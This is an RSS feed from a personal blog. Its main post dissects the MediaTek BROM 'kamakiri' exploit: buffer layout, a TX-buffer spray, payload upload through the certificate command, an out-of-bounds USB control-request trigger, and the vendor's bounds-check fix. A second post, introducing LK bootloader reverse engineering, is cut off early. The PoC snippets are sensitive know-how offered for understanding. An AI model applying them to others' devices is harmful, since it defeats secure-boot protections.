<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>R0rt1z2</title><description>R0rt1z2&apos;s Blog</description><link>https://blog.r0rt1z2.com/</link><language>en</language><item><title>Dissecting a mantis - the kamakiri exploit</title><link>https://blog.r0rt1z2.com/posts/dissecting-a-mantis/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/dissecting-a-mantis/</guid><description>Understanding and explaining the &quot;kamakiri&quot; MediaTek BROM exploit</description><pubDate>Sat, 02 May 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;I&apos;ve known about the &lt;a href=&quot;https://github.com/amonet-kamakiri/kamakiri&quot;&gt;&quot;kamakiri&quot; 🦗 exploit&lt;/a&gt; for a while now, and like many others, I&apos;ve even used it in practice, but I never really stopped to understand how it actually works under the hood.&lt;/p&gt;
&lt;p&gt;There are quite a lot of public MediaTek BROM exploits floating around, but despite their availability, there isn&apos;t much in the way of clear, detailed explanations of how they function internally.&lt;/p&gt;
&lt;p&gt;Because of that, I decided it would be a good idea to sit down and dissect one of them. I chose the original kamakiri exploit since it&apos;s the one I&apos;ve used the most.&lt;/p&gt;
&lt;p&gt;FWIW, this isn&apos;t the beginning of a full write-up series on all the MediaTek exploits, I&apos;m just taking notes so I don&apos;t forget how any of this works later (future-me is notoriously unreliable lol).&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
&lt;p&gt;On MediaTek devices, the BROM, under certain circumstances, exposes a VCOM interface that can be used to unbrick the device with the help of a &lt;strong&gt;Download Agent&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Naturally, this interface is typically protected by a set of security measures that prevent arbitrary payload execution or unrestricted memory access.&lt;/p&gt;
&lt;p&gt;Since this has already been covered in the &lt;a href=&quot;https://blog.r0rt1z2.com/posts/exploiting-mediatek-datwo/#uploading-the-das&quot;&gt;heapbait blog post&lt;/a&gt;, I won&apos;t go into detail here, but the three main mechanisms are &lt;strong&gt;Serial Link Authorization&lt;/strong&gt;, &lt;strong&gt;Download Agent Authentication&lt;/strong&gt;, and &lt;strong&gt;Secure Boot Control&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The reason most of the exploits mentioned earlier were originally developed was to bypass these security measures and achieve arbitrary code execution in the BROM.&lt;/p&gt;
&lt;p&gt;From there, this can be used to unlock the bootloader, unbrick the device, or basically do anything else you want.&lt;/p&gt;
&lt;h1&gt;Origin&lt;/h1&gt;
&lt;p&gt;Before diving into the technical details, it&apos;s worth taking a step back to look at how and why this exploit came to be.&lt;/p&gt;
&lt;p&gt;While it&apos;s unclear how long this vulnerability had been known or exploited privately, the first public mention (and PoC) appeared in 2019, when &lt;a href=&quot;https://github.com/chaosmaster&quot;&gt;k4y0z&lt;/a&gt; and &lt;a href=&quot;https://github.com/xyzz&quot;&gt;xyz`&lt;/a&gt; on XDA &lt;a href=&quot;https://xdaforums.com/t/unlock-root-twrp-unbrick-fire-tv-stick-4k-mantis.3978459/&quot;&gt;released&lt;/a&gt; a method to unlock the bootloader of the Fire TV Stick 4K.&lt;/p&gt;
&lt;p&gt;At the time, the only known BROM exploit was &lt;a href=&quot;https://github.com/xyzz/amonet&quot;&gt;amonet&lt;/a&gt;, which was already a few years old and had been patched on newer devices.&lt;/p&gt;
&lt;p&gt;For those unfamiliar, &quot;kamakiri&quot; is the Japanese word for &quot;mantis&quot;. The exploit takes its name from the device it was first discovered on, the Fire TV Stick 4K, whose codename is &quot;mantis.&quot;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/anatomy-of-a-mantis.png&quot; width=&quot;50%&quot; alt=&quot;Anatomy of a Mantis&quot; /&gt;
  &lt;div style=&quot;font-size:0.8em;color:#777;margin-top:6px&quot;&gt;
    Source: &lt;a href=&quot;https://www.reddit.com/r/Entomology/comments/1s3n9mt/anatomy_of_a_mantis_foreleg/&quot;&gt;u/Halakahiki on Reddit&lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;It&apos;s also worth noting that there are two &quot;variants&quot; of this exploit, though in reality they&apos;re quite different under the hood.&lt;/p&gt;
&lt;p&gt;The most commonly used one is the &quot;v2&quot; (kamakiri2) variant, which came later and is generally easier to work with. &lt;strong&gt;This post will focus on the original one&lt;/strong&gt;.&lt;/p&gt;
&lt;h1&gt;USB Stack&lt;/h1&gt;
&lt;p&gt;To understand the exploit, you first need a rough picture of how the BROM&apos;s USB stack is organized. It&apos;s not complicated, but there are three specific pieces that matter:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The transmit buffer.&lt;/li&gt;
&lt;li&gt;The echo protocol.&lt;/li&gt;
&lt;li&gt;The interface handler table.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each one is nothing special on its own, it&apos;s only when you look at them together that things get interesting.&lt;/p&gt;
&lt;h2&gt;The USB stack layers&lt;/h2&gt;
&lt;p&gt;Before getting into the buffers, it&apos;s worth understanding how the USB stack is organized, because it&apos;s a bit more layered than you might expect.&lt;/p&gt;
&lt;p&gt;At the bottom there&apos;s the raw USB hardware; registers, FIFOs, endpoints. &lt;code&gt;USB_EPFIFOWrite&lt;/code&gt; talks to this level directly, writing bytes into the hardware FIFO one at a time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USB_EPFIFOWrite(uint8_t nEP, uint16_t nBytes, void *pSrc) {
    USB_INDEX = nEP;

    uint8_t *p = (uint8_t *)pSrc;
    uint8_t *fifo = (uint8_t *)(nEP * 4 + 0x11100020);

    while (nBytes--) {
        *fifo = *p++;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Above that sits the ACM layer. &lt;code&gt;USBDL_PutByte&lt;/code&gt; and its receive counterpart handle the staging buffers and know about packet boundaries:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) {
        USB_EPFIFOWrite(...);
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But there&apos;s another layer on top of all of this that&apos;s easy to miss. At some point during initialization, the BROM calls &lt;code&gt;IO_Init&lt;/code&gt;, which sets up a small function pointer table that abstracts over the two supported I/O interfaces, USB and UART:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void IO_Init(IO_INTERFACE vio) {
    if (vio == IO_USB) {
        IO_GetData  = (code *)0x5E99;  // USBDL_GetByte
        IO_PutData  = (code *)0x5EB3;  // USBDL_PutByte (wrapper)
        IO_TX_Flush = (code *)0x7321;  // USBDL_Flush
    } else if (vio == IO_UART) {
        IO_GetData  = (code *)0xD029;  // UART_adpt_GetData
        IO_PutData  = (code *)0xD043;  // UART_adpt_PutData
        IO_TX_Flush = (code *)0xD05D;  // UART_CheckSendComplete
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Whichever interface gets selected, the command handlers don&apos;t call &lt;code&gt;USBDL_PutByte&lt;/code&gt; directly.&lt;/p&gt;
&lt;p&gt;Instead they go through a small serialization layer &lt;code&gt;IO_PutData32_Ex&lt;/code&gt;, &lt;code&gt;IO_PutData16_Ex&lt;/code&gt;, and &lt;code&gt;IO_PutByte_Ex&lt;/code&gt;, which breaks values down into individual bytes and feeds them into &lt;code&gt;IO_PutData&lt;/code&gt; one at a time:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void IO_PutData32_Ex(uint32_t data32, bool flush_tx) {
    for (int i = 0; i &amp;lt; 4; i++) {
        uint8_t byte = data32 &amp;gt;&amp;gt; (24 - i * 8);
        (*IO_PutData)(&amp;amp;byte, 1, 0xffffffff);
    }
    if (flush_tx)
        (*IO_TX_Flush)();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This means none of the command handlers need to know which interface is active, they just call &lt;code&gt;IO_PutData32_Ex&lt;/code&gt; and let the function pointer table sort it out. The full picture looks like this:&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/usb-stack.png&quot; alt=&quot;USB Stack&quot; /&gt;
&lt;/div&gt;
&lt;h2&gt;The transmit buffer&lt;/h2&gt;
&lt;p&gt;When the BROM needs to communicate with the host, it doesn&apos;t read from or write to the USB hardware directly.&lt;/p&gt;
&lt;p&gt;Instead, it stages data in RAM first. There&apos;s a receive buffer for incoming data and a transmit buffer for outgoing data.&lt;/p&gt;
&lt;p&gt;For the receive buffer, incoming bytes from the host land there and get consumed by whatever command handler is currently running.&lt;/p&gt;
&lt;p&gt;The transmit buffer is a structure called &lt;code&gt;usbacm_tx_buf&lt;/code&gt;, sitting at &lt;code&gt;0x001060E0&lt;/code&gt; (for MT8167):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct {
    uint32_t len;    // 0x001060E0 (how many bytes are currently queued)
    uint8_t  data[]; // 0x001060E4 (the actual bytes)
} usbacm_tx_buf;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;len&lt;/code&gt; is the write cursor, it tracks how many bytes are currently sitting in &lt;code&gt;data[]&lt;/code&gt; waiting to be sent.&lt;/p&gt;
&lt;p&gt;Every outgoing byte goes through &lt;code&gt;USBDL_PutByte&lt;/code&gt;, which appends it to &lt;code&gt;data[]&lt;/code&gt; and bumps &lt;code&gt;len&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_PutByte(uint8_t data) {
    usbacm_tx_buf.data[usbacm_tx_buf.len] = data;
    usbacm_tx_buf.len++;
    if (usbacm_tx_buf.len == packet_size) { // 64 on FS, 512 on HS
        USB_EPFIFOWrite(txpipe-&amp;gt;byEP, packet_size, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(txpipe-&amp;gt;byEP);
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once &lt;code&gt;len&lt;/code&gt; hits the packet size, the buffer gets flushed to the hardware FIFO and &lt;code&gt;len&lt;/code&gt; resets to zero. The bytes in &lt;code&gt;data[]&lt;/code&gt; don&apos;t get cleared, they just sit there in RAM until something else writes over them.&lt;/p&gt;
&lt;p&gt;There&apos;s also &lt;code&gt;USBDL_Flush()&lt;/code&gt;, which sends whatever&apos;s currently queued without waiting for the buffer to fill up:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USBDL_Flush(void) {
    if (nDevState == DEVSTATE_CONFIG &amp;amp;&amp;amp; usbacm_tx_buf.len != 0) {
        nEP = txpipe-&amp;gt;byEP;
        gUSBAcm_IsInEPComplete = false;
        USB_EPFIFOWrite(nEP, usbacm_tx_buf.len, usbacm_tx_buf.data);
        USB_EP_Bulk_Tx_Ready(nEP);
        while (!gUSBAcm_IsInEPComplete)
            USB_HISR();
        usbacm_tx_buf.len = 0;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Same result, &lt;code&gt;len&lt;/code&gt; resets to zero, bytes stay in RAM. This &quot;stale bytes&quot; behavior is going to matter a lot later.&lt;/p&gt;
&lt;h2&gt;BROM command loop&lt;/h2&gt;
&lt;p&gt;BROM doesn&apos;t always end up in the command loop, this only happens when it boots into USBDL mode. There are a few reasons this can happen.&lt;/p&gt;
&lt;p&gt;The most common ones are a missing or invalid Preloader, a shorted eMMC, or a device that&apos;s simply blank from the factory. Some devices also expose a button combo that forces USBDL mode at boot.&lt;/p&gt;
&lt;p&gt;Whatever the cause, once the BROM decides it&apos;s in USBDL mode, it initializes the USB stack and starts waiting for the host to interact with it.&lt;/p&gt;
&lt;p&gt;The loop reads a command byte and dispatches it to the appropriate handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void BromCmdLoop(void) {
    BromCmdLoop_Init();
    while (true) {
        uint8_t cmd = IO_GetByte();
        IO_PutByte_Ex(cmd, true); // echo cmd
        switch (cmd) {
        case 0xD1: BromCmd_Read(CMD_LEN_32, false);  break;
        case 0xD4: BromCmd_Write(CMD_LEN_32, true);  break;
        case 0xE0: BromCmd_SendCert();               break;
        case 0xFD: BromCmd_Get_HW_Code();            break;
        // ...
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are quite a few commands, but the ones relevant to this exploit are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;0xD1&lt;/code&gt;: &lt;code&gt;BromCmd_Read&lt;/code&gt;: read arbitrary memory and echo it back&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xD4&lt;/code&gt;: &lt;code&gt;BromCmd_Write&lt;/code&gt;: write arbitrary memory&lt;/li&gt;
&lt;li&gt;&lt;code&gt;0xE0&lt;/code&gt;: &lt;code&gt;BromCmd_SendCert&lt;/code&gt;: load a blob into memory at a fixed address&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Every one of these handlers echoes its arguments back before doing anything.&lt;/p&gt;
&lt;h2&gt;The interface handler table&lt;/h2&gt;
&lt;p&gt;When the BROM receives a USB control request on endpoint 0, it hands it off to &lt;code&gt;USB_Endpoint0_Idle&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This function is responsible for parsing the request and dispatching it to the appropriate handler:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void USB_Endpoint0_Idle(void) {
    USB_EPFIFORead(0, 8, &amp;amp;cmd);

    if ((cmd.bmRequestType &amp;amp; USB_CMD_TYPEMASK) == 0) {
        // standard requests
        switch (cmd.bRequest) {
        case 0x05: stall = USB_Cmd_SetAddress(&amp;amp;ep0info, &amp;amp;cmd);    break;
        case 0x06: stall = USB_Cmd_GetDescriptor(&amp;amp;ep0info, &amp;amp;cmd); break;
        case 0x09: stall = USB_Cmd_SetConfiguration(&amp;amp;ep0info, &amp;amp;cmd); break;
        case 0x0b: stall = USB_Cmd_SetInterface(&amp;amp;ep0info, &amp;amp;cmd);  break;
        // ...
        }
        return;
    }

    // class specific requests
    if ((cmd.bmRequestType &amp;amp; 0x60) != 0x20) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if ((cmd.bmRequestType != 0xA1) &amp;amp;&amp;amp; (cmd.bmRequestType != 0x21)) {
        USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
        return;
    }

    if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
        (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
        return;
    }

    USB_Update_EP0_State(USB_EP0_DRV_STATE_READ_END, 1, false);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Standard requests like &lt;code&gt;SetAddress&lt;/code&gt; or &lt;code&gt;GetDescriptor&lt;/code&gt; are handled inline whereas class specific requests (identified by &lt;code&gt;bmRequestType&lt;/code&gt; having the class bit set) get dispatched through a different path.&lt;/p&gt;
&lt;p&gt;For those, the BROM looks up the handler in &lt;code&gt;if_info&lt;/code&gt;, a table of interface descriptors sitting at &lt;code&gt;0x00103780&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each entry is &lt;code&gt;0x34&lt;/code&gt; bytes and contains, among other things, a function pointer at offset &lt;code&gt;+0x04&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Usb_Interface_Info {
    char     *interface_name;          // +0x00
    void     *if_class_specific_hdlr;  // +0x04 (function pointer)
    uint16_t  ifdscr_size;             // +0x08
    // ...
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When a class specific request comes in, the BROM takes &lt;code&gt;cmd.wIndex&lt;/code&gt;, uses it as an index into &lt;code&gt;if_info&lt;/code&gt;, and calls the handler directly:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are only three registered interfaces, but nothing stops you from requesting &lt;code&gt;wIndex=200&lt;/code&gt;, or &lt;code&gt;wIndex=204&lt;/code&gt;, or any other value that lands outside the legitimate interface entries.&lt;/p&gt;
&lt;h1&gt;Walking through the PoC&lt;/h1&gt;
&lt;p&gt;Now that we have a somewhat solid understanding of the USB stack, let&apos;s walk through the exploit step by step.&lt;/p&gt;
&lt;p&gt;The PoC we&apos;ll be looking at can be found &lt;a href=&quot;https://github.com/R0rt1z2/kamakiri/blob/kamakiri-mt8167/modules/load_payload.py&quot;&gt;here&lt;/a&gt; and there are probably other versions floating around, but they all do the same thing in the end.&lt;/p&gt;
&lt;h2&gt;Handshake and setup&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;dev.handshake()
dev.write32(0x10007000, 0x22000000)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Before anything else, the host needs to establish communication with the BROM. The handshake is a simple four byte sequence.&lt;/p&gt;
&lt;p&gt;BROM expects &lt;code&gt;A0 0A 50 05&lt;/code&gt; and responds with the bitwise complement of each byte. Once that&apos;s done, it is ready to accept commands.&lt;/p&gt;
&lt;p&gt;If the device was entered via a hardware short on the eMMC, the user also needs to release the short at this point before continuing.&lt;/p&gt;
&lt;p&gt;The PoC handles this with a small thread that kicks the watchdog every second while waiting for user input:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;thread = UserInputThread()
thread.start()
while not thread.done:
    dev.write32(0x10007008, 0x1971)  # kick watchdog
    time.sleep(1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Once the short is released and the thread signals done, execution continues with the rest of the exploit.&lt;/p&gt;
&lt;h2&gt;The TX buffer spray&lt;/h2&gt;
&lt;p&gt;The next thing the PoC does is manipulate the TX buffer:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;addr = 0x10007050
dev.write32(addr, [0xA1000])
cnt = 15
for i in range(cnt):
    dev.read32(addr - (cnt - i) * 4, cnt - i + 1)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The goal is to get &lt;code&gt;0x000A1000&lt;/code&gt;, the payload address in LE, to land at a specific offset inside &lt;code&gt;usbacm_tx_buf&lt;/code&gt; that corresponds to &lt;code&gt;if_info[wIndex].if_class_specific_hdlr&lt;/code&gt; for the &lt;code&gt;wIndex&lt;/code&gt; we plan to use in the trigger step.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;WDT_BASE + 0x50&lt;/code&gt; is used as the scratch address because it falls inside the watchdog register region, one of the memory regions the BROM allows you to access freely.&lt;/p&gt;
&lt;p&gt;What the register itself does doesn&apos;t really matter, what matters is that it&apos;s accessible without triggering any access violations.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;write32(addr, [0xA1000])&lt;/code&gt; plants &lt;code&gt;0x000A1000&lt;/code&gt; there. From that point, the loop issues a series of reads with increasing starting addresses and sizes, all anchored around &lt;code&gt;addr&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Each iteration reads one more word than the last, starting one address further back:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;i=0:  read32(addr - 60, 16)
i=1:  read32(addr - 56, 15)
...
i=14: read32(addr - 4,  2) (last word = addr = 0x000A1000)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Every one of those reads echoes its data back through &lt;code&gt;USBDL_PutByte&lt;/code&gt;, accumulating in the TX buffer. The exact offsets depend on the memory layout of the specific BROM.&lt;/p&gt;
&lt;p&gt;The end result is the same. &lt;code&gt;0x000A1000&lt;/code&gt; ends up sitting at the right offset inside &lt;code&gt;usbacm_tx_buf&lt;/code&gt; to overlap with &lt;code&gt;if_info[wIndex].if_class_specific_hdlr&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;Loading the payload&lt;/h2&gt;
&lt;p&gt;For the exploit to work, there has to be a way to upload arbitrary code into memory. Thankfully, &lt;code&gt;BromCmd_SendCert&lt;/code&gt; (&lt;code&gt;0xE0&lt;/code&gt;) does exactly that.&lt;/p&gt;
&lt;p&gt;It was probably designed to receive a certificate blob from the host and load it into memory at &lt;code&gt;0x100A00&lt;/code&gt; for verification.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def attempt2(d):
    d.write(b&quot;\xE0&quot;)
    result = d.read(1)
    d.write(p32(0xA00))
    result = d.read(4)
    payload = load_payload_file(&quot;../brom-payload/stage1/stage1.bin&quot;)
    d.write(payload)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The host sends &lt;code&gt;0xA00&lt;/code&gt; as the length, the BROM echoes it back, then reads that many bytes into &lt;code&gt;0x100A00&lt;/code&gt;. On the BROM side:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uint32_t BromCmd_SendCert(void) {
    uint32_t len = IO_GetData32();
    IO_PutData32_Ex(len, true);

    if (!bExecOnce) {
        bExecOnce = true;
        if (Secure_SCTRL_CERT_IsValidRange(len) &amp;lt; 0xff) {
            IO_PutData16_Ex(status, true);
            IO_GetDataBlock8(0x100A00, len, 5);  // payload lands here
            Secure_SCTRL_CERT_Verify(0x100A00);  // fails, but doesn&apos;t clean up
        }
    }

    IO_PutData16_Ex(status, true);
    return status;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The detail here is that the data gets written to memory &lt;em&gt;before&lt;/em&gt; verification runs. The cert check will fail since we&apos;re not sending anything valid, but BROM never cleans up the memory afterwards.&lt;/p&gt;
&lt;p&gt;The only real constraint is size, the payload must fit within &lt;code&gt;0xA00&lt;/code&gt; bytes, which is solved by using a two-stage approach.&lt;/p&gt;
&lt;h2&gt;Pulling the trigger&lt;/h2&gt;
&lt;p&gt;At this point the two pieces are in place, the payload is sitting at &lt;code&gt;0x100A00&lt;/code&gt; and &lt;code&gt;usbacm_tx_buf&lt;/code&gt; has been sprayed with &lt;code&gt;0x000A1000&lt;/code&gt; at the right offset. All that&apos;s left is to trigger the jump.&lt;/p&gt;
&lt;p&gt;To confirm this, here&apos;s a hexdump of &lt;code&gt;usbacm_tx_buf&lt;/code&gt; taken from inside the stage1 payload immediately after it starts running:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;001060E0  00 00 00 00 A1 A2 A3 A4  00 0A 10 00 00 0A 10 00  |................|
001060F0  00 0A 10 00 00 0A 10 00  00 0A 10 00 00 0A 10 00  |................|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;len&lt;/code&gt; is zero (the buffer was flushed), and &lt;code&gt;0x000A1000&lt;/code&gt; is sitting repeatedly through &lt;code&gt;data[]&lt;/code&gt;. The value at &lt;code&gt;data[16]&lt;/code&gt; = &lt;code&gt;0x1060F4&lt;/code&gt; is what matters, that&apos;s where &lt;code&gt;if_info[204].if_class_specific_hdlr&lt;/code&gt; lives:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; hex(0x00103780 + 204 * 0x34 + 4)
&apos;0x1060F4&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;0x00103780&lt;/code&gt; is the base address of &lt;code&gt;if_info&lt;/code&gt;, &lt;code&gt;0x34&lt;/code&gt; is the size of each entry, &lt;code&gt;204&lt;/code&gt; is the index, and &lt;code&gt;+4&lt;/code&gt; is the offset of &lt;code&gt;if_class_specific_hdlr&lt;/code&gt; within the entry.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/kamakiri/tx-buf-overlap.png&quot; alt=&quot;TX Buffer Overlap&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The result lands exactly at &lt;code&gt;0x1060F4&lt;/code&gt;, inside &lt;code&gt;usbacm_tx_buf.data[]&lt;/code&gt;. The trigger is a USB control request:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try:
    udev.ctrl_transfer(0xA1, 0, 0, 204, 0)
except usb.core.USBError as e:
    print(e)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;0xA1&lt;/code&gt; is &lt;code&gt;bmRequestType&lt;/code&gt; with the class bit set (&lt;code&gt;0x20&lt;/code&gt;) and the direction bit set (&lt;code&gt;0x80&lt;/code&gt;). This translates to a class-specific request from device to host.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;wIndex=204&lt;/code&gt; is what gets used to index into &lt;code&gt;if_info&lt;/code&gt;. &lt;code&gt;USB_Endpoint0_Idle&lt;/code&gt; receives the request and does:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;if_info[204].if_class_specific_hdlr&lt;/code&gt; contains &lt;code&gt;0x000A1000&lt;/code&gt; (put there by the spray) so execution jumps straight to the payload at &lt;code&gt;0x100A00&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The stage1 payload confirms it&apos;s running by sending back &lt;code&gt;0xA1A2A3A4&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data = d.read(4)
if data != b&quot;\xA1\xA2\xA3\xA4&quot;:
    raise RuntimeError(&quot;...&quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If that comes back, the exploit succeeded and the payload is running.&lt;/p&gt;
&lt;h1&gt;Fixes&lt;/h1&gt;
&lt;p&gt;The vulnerability was patched at some point, the first chip where it was publicly identified to be fixed is the MT6853, &lt;a href=&quot;https://github.com/chaosmaster/bypass_payloads/issues/7&quot;&gt;seen in 2021&lt;/a&gt;, but it may have been patched earlier on other chips.&lt;/p&gt;
&lt;p&gt;The fix itself is straightforward, a simple bounds check on &lt;code&gt;wIndex&lt;/code&gt; before the handler dispatch:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// vulnerable
if (if_info[(byte)cmd.wIndex].if_class_specific_hdlr != NULL) {
    (*if_info[(byte)cmd.wIndex].if_class_specific_hdlr)(&amp;amp;ep0info, &amp;amp;cmd);
    return;
}

// fixed
if (((byte)cmd.wIndex &amp;lt; 3) &amp;amp;&amp;amp;
    (handler = if_info[(byte)cmd.wIndex].if_class_specific_hdlr, handler != NULL)) {
    (*handler)();
    return;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are only three registered interfaces, so any &lt;code&gt;wIndex &amp;gt;= 3&lt;/code&gt; now gets rejected outright. The OOB access into &lt;code&gt;if_info&lt;/code&gt; is no longer possible.&lt;/p&gt;
&lt;p&gt;On the &lt;code&gt;BromCmd_SendCert&lt;/code&gt; side, the patched BROM also zeroes out the memory at &lt;code&gt;0x100A00&lt;/code&gt; if verification fails:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (verify_failed) {
    memset(0x100A00, 0, len);  // clean up on failure
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So even if the jump could somehow be triggered, there&apos;d be nothing useful at &lt;code&gt;0x100A00&lt;/code&gt; to land on.&lt;/p&gt;
&lt;h1&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Seven years. That&apos;s how long it took me to actually sit down and understand an exploit I&apos;ve been using since forever. Better late than never I guess.&lt;/p&gt;
&lt;p&gt;And honestly, now that I understand how it works, I&apos;m surprised at how &quot;simple&quot; it actually is, at least compared to a lot of the other exploits that I&apos;ve looked at.&lt;/p&gt;
&lt;p&gt;I wasn&apos;t even planning to make this a whole post, this was meant to be my own documentation for future reference, but I figured it might be useful for others as well. I hope it was informative.&lt;/p&gt;
</content:encoded></item><item><title>How to Reverse Engineer MediaTek Bootloaders</title><link>https://blog.r0rt1z2.com/posts/reverse-engineering-mediatek-lk/</link><guid isPermaLink="true">https://blog.r0rt1z2.com/posts/reverse-engineering-mediatek-lk/</guid><description>A quick introduction and guide to reverse engineering MediaTek bootloaders (LK)</description><pubDate>Mon, 30 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;I&apos;ve been working on a lot of projects involving MediaTek bootloaders lately, and they&apos;ve been getting more attention over time.&lt;/p&gt;
&lt;p&gt;Because of that, I thought it would make sense to put together a proper guide on how to reverse engineer MediaTek LKs, while keeping it as beginner friendly as possible and adding some visuals along the way.&lt;/p&gt;
&lt;p&gt;I&apos;ve written a few guides on this topic before, but I&apos;ve improved quite a bit since then and started using some new techniques that make the process easier.&lt;/p&gt;
&lt;p&gt;So instead of leaving everything scattered, this guide brings it all together in one place (or tries to, at least).&lt;/p&gt;
&lt;h1&gt;Requirements&lt;/h1&gt;
&lt;p&gt;This guide assumes you have a computer and at least some basic common sense. Other than that, you&apos;ll need:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.oracle.com/java/technologies/downloads/&quot;&gt;JDK (for Ghidra)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.nsa.gov/ghidra&quot;&gt;Ghidra (this guide uses Ghidra exclusively)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/R0rt1z2/lkpatcher&quot;&gt;lkpatcher&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Install everything from the official sources linked above, and make sure your Java environment is set up correctly for Ghidra.&lt;/p&gt;
&lt;p&gt;I&apos;m not going to cover installation here since it&apos;s straightforward, and you can always look it up if needed.&lt;/p&gt;
&lt;h1&gt;Background&lt;/h1&gt;
